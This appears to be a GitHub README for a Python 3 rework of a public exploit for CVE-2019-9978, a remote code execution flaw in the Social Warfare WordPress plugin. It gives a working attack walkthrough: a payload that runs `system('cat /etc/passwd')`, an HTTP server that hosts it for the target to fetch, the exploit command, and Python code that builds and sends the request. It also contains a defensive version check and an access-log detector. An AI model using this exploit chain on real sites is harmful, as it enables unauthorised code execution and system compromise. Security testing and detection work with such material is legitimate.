# CVE-2019-9978 - Social Warfare WordPress Plugin RCE < 3.5.3
A Remote Code Execution (RCE) vulnerability in the **Social Warfare** plugin for WordPress, affecting all versions below **3.5.3**.
---
## 💡 Motivation
The original public exploit was written in an outdated version of Python and no longer runs properly in modern environments.
I rewrote the exploit to be fully compatible with **Python 3**, making it easier to use, understand, and integrate into modern tooling.
---
## Proof of Concept (PoC)
### ✅ Step 1 – Create the Payload
Create a file named `payload.txt` with the following content. The vulnerable debug routine fetches this file and passes whatever sits between `<pre>` and `</pre>` to PHP's `eval()`, so the tags are required, and the PHP inside them must not itself contain `</pre>`:
```html
<pre>system('cat /etc/passwd')</pre>
```
---
### ✅ Step 2 – Start a Python HTTP Server
From the directory containing `payload.txt`, serve it over HTTP. The WordPress server fetches the payload itself, so it must be able to reach this host and port:
```bash
python3 -m http.server 8000
```
This will make your `payload.txt` accessible at:
```
http://<your-ip>:8000/payload.txt
```
---
### ✅ Step 3 – Run the Exploit
```bash
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
```
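The three steps above carried through in one place, as an added example written for this README (it is not the repository's `CVE-2019-9978.py` and not Social Warfare code): it builds the request the public exploit sends, a GET to `/wp-admin/admin-post.php` with `swp_debug=load_options` and `swp_url` set to the payload URI, and mirrors what the vulnerable debug routine does with the fetched file, keeping only the text between `<pre>` and `</pre>` before handing it to `eval()`. The helper names (`make_payload`, `extract_pre_body`, `send`), the placeholder addresses, and the regular expression used to mirror the extraction are this example's own choices, not the plugin's or the PoC's code.

```python
"""Added example for this README: the exploit chain in one file.
Not the repository's CVE-2019-9978.py and not Social Warfare code."""
import re
import urllib.parse
import urllib.request
from typing import Optional

# The debug hook in affected versions reads swp_debug=load_options and
# fetches the URL in swp_url; the public PoC sends this to admin-post.php.
VULN_PATH = "/wp-admin/admin-post.php"


def build_exploit_url(target: str, payload_uri: str) -> str:
    """Compose the GET request that step 3 of the walkthrough issues."""
    base = target.rstrip("/")
    query = urllib.parse.urlencode(
        {"swp_debug": "load_options", "swp_url": payload_uri}
    )
    return f"{base}{VULN_PATH}?{query}"


def make_payload(php: str) -> str:
    """Wrap PHP in the <pre> tags the plugin looks for (step 1).

    The plugin cuts the fetched file at the closing tag, so PHP that
    contains '</pre>' would be truncated before eval(); refuse it.
    """
    if "</pre>" in php:
        raise ValueError("payload must not contain '</pre>'")
    return f"<pre>{php}</pre>\n"


def extract_pre_body(fetched: str) -> Optional[str]:
    """Mirror of the plugin-side handling of the fetched file: only the
    text between <pre> and </pre> is evaluated. Returns None when the
    tags are absent (nothing to eval). Behavioural mirror only; the
    regex is this example's assumption, not the plugin's code."""
    m = re.search(r"<pre>(.*?)</pre>", fetched, re.S)
    return m.group(1) if m else None


def send(target: str, payload_uri: str, timeout: float = 10.0) -> str:
    """Issue the request and return the raw response body (step 3).
    Only for systems you are authorised to test; not called on import."""
    req = urllib.request.Request(build_exploit_url(target, payload_uri))
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Addresses below are placeholders (assumption), not real hosts.
    payload = make_payload("system('cat /etc/passwd')")
    print("payload.txt contents:", payload, end="")
    print("plugin would eval:", extract_pre_body(payload))
    print("request:", build_exploit_url("http://<target-ip>/wordpress",
                                        "http://<your-ip>:8000/payload.txt"))
```

Run the module directly to see the generated `payload.txt` body and the request URL; `send()` is left for you to call explicitly so that importing the file never touches the network.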
---
### Expected Output
If the target is vulnerable, you will receive output similar to:
```
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```
---
## Screenshots
- HTTP Server Receives Request (screenshot)
- Successful Exploit Execution (screenshot)
- Payload File Content (screenshot)
---
## Technical Details
- **Plugin:** Social Warfare
- **Affected Versions:** `< 3.5.3`
- **CVE:** CVE-2019-9978 ([Exploit-DB 46794](https://www.exploit-db.com/exploits/46794))
- **Vulnerability Type:** Remote Code Execution (RCE)
- **Original Author:** [@hash3liZer](https://github.com/hash3liZer/CVE-2019-9978)
- **Researcher:** Luka Sikic
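Two checks a defender would want alongside the details above, as an added example that is not part of this repository or of the plugin: a version comparison against the 3.5.3 fix, reading the `Stable tag:` line that WordPress plugins expose in their `readme.txt`, and a sweep of web server access logs for the `swp_debug=load_options` request together with the `swp_url` location the plugin would have fetched the payload from. The log lines, IP addresses, readme text and helper names are constructed for the example.

```python
"""Added example for this README: a version check and an access-log sweep
for CVE-2019-9978 exploitation attempts. Not part of the PoC repository."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

FIXED_VERSION = (3, 5, 3)  # first release without the load_options bug

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '3.5.2' into (3, 5, 2) so releases compare numerically."""
    return tuple(int(p) for p in version.strip().split("."))


def is_vulnerable_version(version: str) -> bool:
    """True for any Social Warfare release below 3.5.3."""
    return parse_version(version) < FIXED_VERSION


def version_from_readme(readme_txt: str) -> Optional[str]:
    """Read 'Stable tag:' from a WordPress plugin readme.txt, which
    plugins ship at wp-content/plugins/<slug>/readme.txt."""
    m = re.search(r"^Stable tag:\s*([0-9][0-9.]*)\s*$", readme_txt, re.M)
    return m.group(1) if m else None


def find_exploit_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per request that carries swp_debug=load_options,
    with the host the plugin would have fetched the payload from."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        parts = urlsplit(m.group("target"))
        query = parse_qs(parts.query)  # decodes %xx in parameter values
        if query.get("swp_debug", [""])[0] != "load_options":
            continue
        payload_url = query.get("swp_url", [""])[0]
        hits.append({
            "src": m.group("src"),
            "time": m.group("ts"),
            "status": m.group("status"),
            "path": parts.path,
            "payload_url": payload_url,
            "payload_host": urlsplit(payload_url).hostname or "",
        })
    return hits


# Constructed sample input (not real traffic): two attempts from one
# client, the second with a percent-encoded swp_url, and a normal page load.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Mar/2019:18:02:11 +0000] "GET /wordpress/wp-admin/'
    'admin-post.php?swp_debug=load_options&swp_url=http://198.51.100.23:8000/'
    'payload.txt HTTP/1.1" 200 5120 "-" "python-requests/2.21.0"',
    '198.51.100.4 - - [21/Mar/2019:18:02:14 +0000] "GET /wordpress/?p=12 '
    'HTTP/1.1" 200 8320 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Mar/2019:18:02:20 +0000] "GET /wordpress/wp-admin/'
    'admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2F198.51.100.23'
    '%3A8000%2Fp.txt HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
]

# Constructed readme.txt fragment in the WordPress plugin readme layout.
SAMPLE_README = "=== Social Warfare ===\nStable tag: 3.5.2\n\n== Description ==\n"


if __name__ == "__main__":
    installed = version_from_readme(SAMPLE_README)
    print(f"installed {installed}: vulnerable={is_vulnerable_version(installed)}")
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['src']} -> {hit['path']} "
              f"payload from {hit['payload_host']} ({hit['status']})")
```

Any `swp_debug=load_options` request from an unauthenticated client is worth a look regardless of status code; the `payload_host` field gives you the address to block and to pull the payload from for analysis.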
---
## Credits
- **Exploit Author:** [@hash3liZer](https://github.com/hash3liZer)
- **Python 3 Rework:** [@echosso](https://www.linkedin.com/in/oussama-larhnimi-8a1a01b8/)
---
> ⚠️ **Disclaimer**: This repository is for educational and ethical testing purposes only.
> Unauthorized use of this exploit against systems you do not own is strictly prohibited.